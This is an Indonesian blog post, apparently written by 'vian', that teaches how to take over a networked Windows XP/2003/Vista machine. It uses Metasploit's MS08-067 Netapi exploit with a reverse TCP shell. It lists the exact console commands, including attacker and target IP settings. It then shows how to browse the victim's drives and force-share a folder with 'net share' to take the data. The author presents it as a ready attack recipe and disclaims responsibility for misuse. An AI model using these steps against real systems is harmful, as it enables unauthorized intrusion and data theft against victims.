mengambil alih komputer target dalam jaringan
Tanpa banyak bacot dari ane lagi,silahkan anda baca judul diatas,kali ini teknik yang kita gunakan yaitu teknik Remote Exploit. Dan Yang perlu kamu siapkan pada sesi kali ini yaitu:
mengambil alih komputer target dalam jaringan
- Metasploit Framework 3.2 For Windows, dapat kamu download disini: http://www.metasploit.org/framework/download/?id=framework-3.2.exe
- Komputer target yang menggunakan OS Win XP SP2, SP3, Win2003, atau WinVista. (gue menggunakan Windows XP SP2).
- - Alamat IP Address Target.
Jika
diatas telah terpenuhi, sekarang kamu jalankan Program Metasploit
3.2, tepatnya kamu pilih Metasploit 3 Web (lihat gambar).
mengambil alih komputer target dalam jaringan
mengambil alih komputer target dalam jaringan
Tunggu beberapa saat,(sabar yach) Setelah itu akan tampil seperti gambar dibawah ini:
Jika udah tampil loe pilih menu Console. Maka akan tampil jendela seperti berikut:
mengambil alih komputer target dalam jaringan
Ketikkan perintah show exploits kemudian tekan Enter
Maka akan tampil Modul exploit seperti beirkut:
mengambil alih komputer target dalam jaringan
Kemudian pilih modul exploit untuk kelemahan pada Netapi32, caranya dengan mengetikkan :
use windows/smb/ms08_067_netapi kemudian Enter
Kemudian
pilih jenis payload. Kali ini kita pilih payload yang akan
menghubungkan shell komputer target dengan komputer penyerang melalui
TCP. Caranya dengan mengetikkan perintah:
set payload windows/shell/reverse_tcp (kemudian Enter)
Kemudian masukkan IP Address kamu, dengan cara mengetikkan perintah :
set LHOST 192.168.0.17 Enter <----- Contoh dengan IP gue.
set LHOST 192.168.0.17 Enter <----- Contoh dengan IP gue.
Kemudian masukkan IP Address target kamu, dengan cara mengetikkan perintah :
set RHOST 192.168.0.16 Enter <----- Contoh dengan Target gue.
set RHOST 192.168.0.16 Enter <----- Contoh dengan Target gue.
Semuanya udah siap…? Siap…!!! Ready!!! 1….2….3… tunggu dulu bro, ketik dulu instruksi/perintah exploit kemudian tekan Enter.
Tedennnnggggg!!! Abrakadabra!!!, sistem target telah diambil alih
Sekarang kita telah berada di direktori c:\windows\system32
sang target. Akses penuh telah ditangan. Selanjutnya tinggal
kreatifitas kalian. Untuk mengintip data pada komputer target, silahkan
jalankan perintah MS DOS. Sebagai contoh, kita akan menuju drive “D”
korban, dengan mengetikkan perintah >> d: Enter. Kemudian lakukan perintah DIR untuk melihat isi data drive D komputer korban.
Untuk mengambil data pada komputer korban, kita akan melakukan sharing paksa dari komputer korban dengan menjalankan perintah.
net share namafolder=d:\lokasifolder /UNLIMITED kemudian enter. Lihat gambar dibawah ini:
Kemudian
masuk pada windows Explorer, lalu ketikkan pada Address Bar \\Alamat
IP target\namafolder yang telah dishare paksa. Contoh:
ada dua kemungkinan yg bisa muncul,berhasil dan...gagal...coba2
aja...mungkin berhasil...ingat klw berhasil dosa anda tanggung
sendiri,saya tidak bertanggung jawab,
by vian
Tidak ada komentar:
Posting Komentar